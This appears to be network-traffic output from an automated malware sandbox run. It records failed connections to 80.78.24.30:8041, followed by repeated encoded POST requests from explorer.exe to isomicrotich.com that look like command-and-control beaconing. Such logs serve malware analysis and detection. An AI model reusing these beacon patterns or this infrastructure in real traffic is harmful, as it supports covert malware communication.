Oct 3, 2024 20:47:45.236043930 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.2.7 | 62374 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:50.138189077 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.7 | 62376 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:50.765396118 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.2.7 | 62382 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:55.527996063 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.2.7 | 62384 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:56.158086061 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.7 | 62388 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:59.966016054 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.7 | 62390 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:00.604720116 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.7 | 62397 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:06.335129023 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.7 | 62398 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:07.002310038 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.7 | 62403 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:09.718934059 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
83 | 192.168.2.7 | 62405 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:10.363353014 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.2.7 | 62411 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:16.427480936 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.2.7 | 62413 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:17.074749947 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.2.7 | 62418 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:20.748904943 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.2.7 | 62419 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:48:21.386271954 CEST | 103 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 62255 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:23 UTC | 422 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 92
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:23 UTC | 92 | OUT | Data Raw: 31 51 44 56 39 33 6c 49 59 36 59 33 35 2f 69 57 77 44 6f 65 6b 61 43 36 6b 61 43 41 69 7a 4e 79 5a 51 78 76 35 61 52 59 74 4d 4e 45 34 73 65 48 50 58 52 62 71 44 7a 6f 4a 52 70 6f 48 76 7a 37 56 5a 4b 6d 4e 44 79 65 41 6a 70 44 4c 30 49 47 51 4a 7a 4e 57 52 56 48 7a 56 45 3d
                                                                                                                                                                                                                                                Data Ascii: 1QDV93lIY6Y35/iWwDoekaC6kaCAizNyZQxv5aRYtMNE4seHPXRbqDzoJRpoHvz7VZKmNDyeAjpDL0IGQJzNWRVHzVE=
2024-10-03 18:46:24 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IRBfL%2FWCKYcKQJSkfdXZub6pXesrcbLQhvw%2BvzPhzlqe7jB15vYsGi4Y2EmNktvU%2FnE6%2FbMKkUhurIJQPwCHYUpuiCZnwngwp1jZY21aLW6hqynkf7RJ%2BtJckDsYqpe7oQc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf183e8c79423f-EWR
2024-10-03 18:46:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 62257 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:25 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:26 UTC | 556 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMIj7w2nlAfm%2BruvGC3UGXMbHtKCC%2Bfuo%2FDH1syeDLBM5BKk%2B6JhtYW50mmEmWqq1RpGZK%2BZogoSXsaRm7C%2FqAeKs%2F1fN0xLFD%2BPcP1gwsqS%2B4Tx5odWma2%2BaIlvB4XeAm9f"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf184aa90e32f4-EWR
2024-10-03 18:46:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 62258 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:26 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:27 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:27 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpnOj2jFvFabvZcNba6gtPJSdTIAiQgKPxXKjG7snmm99kyYcupNSGDOa2iqXnEs26%2F9yd9kapQsWaPNz%2B3ompoDMkWktSNgcy8j7qWQZgp9enc2obZVC5UdE0BUBwXjzqM6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1851cda37cb1-EWR
2024-10-03 18:46:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 62259 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:27 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:28 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHIwFDoUQFR55LozEWSxyTN1wCAgJdnorpkaI%2FUIII6LPRXQhRMLsQsHxVoW4G1A3XxMkqDnLbyc%2Baf5c7PxcA2Px13Il4tKy5xXGI1gfIOAlKWUxDHg1Vyzgi8gkIGDjKgh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18584efc19aa-EWR
2024-10-03 18:46:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 62261 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:28 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:29 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5t8ezLelBzD%2BLsY2b229sCtR3oVwfyoggJ7%2FZEibj0WpbNhn3SQ8hTdS1g6zqVq4WkLg1rSyIVE0CAIuQesdy6UKpv5AdK6ongtsmsA%2FZ5SNlCcrK3YAtv8g80L789YPslgj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf185f8c0e42b5-EWR
2024-10-03 18:46:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 62263 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:30 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:30 UTC | 573 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVX8%2BwQyO%2F%2F1mp90V1x%2F9z4deV35ShtIV7j7M6SajvNli5xArUR75v%2FgoLfqLTmKkmNIauVFOivY4AWY%2F0g26TzWBO7neu6gQ9bo9LXGIafmpOmLIesgwt2h%2FRGGfnEdCF3M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18666f750f68-EWR
2024-10-03 18:46:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 62265 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:31 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:32 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8rnkBSrl1QJibTmsTWyo4sj%2BKprZYSv814ObQaQ7CnPUA8UApkQ11wcy%2F2lbQHokTDLE17xjIbiUZCi519d5lbxFPAhyHsXzyGXJVc8sf9CrBw0QFGGAyVvQBwW3EqBqWy5X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf186fec495e74-EWR
2024-10-03 18:46:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 62267 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:32 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:33 UTC | 552 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FbZKKBnnq5oYon2qpwT6%2FPn3qLkCsGUWyNWIVuyIIPpOBYusB1dRCURKHU8EWaZwpBtrqB%2FEjml6uoXo%2BYIbL6JDAB1m2%2BxkzIROsWcJFsvTiNAH3cSeTJKJa%2FDyLSy%2FgnY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18763fc78ce9-EWR
2024-10-03 18:46:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 62270 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:34 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:34 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Vt2kptttc83mJ%2BUAh9v7QTEJ7cueToTxtiqe5w98bmpv1KmDqAQwr7AIKHTJ8h00qCfxSjgi34k4LBHC%2BLvYRzI5KJqvJUC60vvNtMalk4ryjk0Ofs0hfAOWYsSqneEDyzl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18800d581791-EWR
2024-10-03 18:46:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 62271 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:35 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:35 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
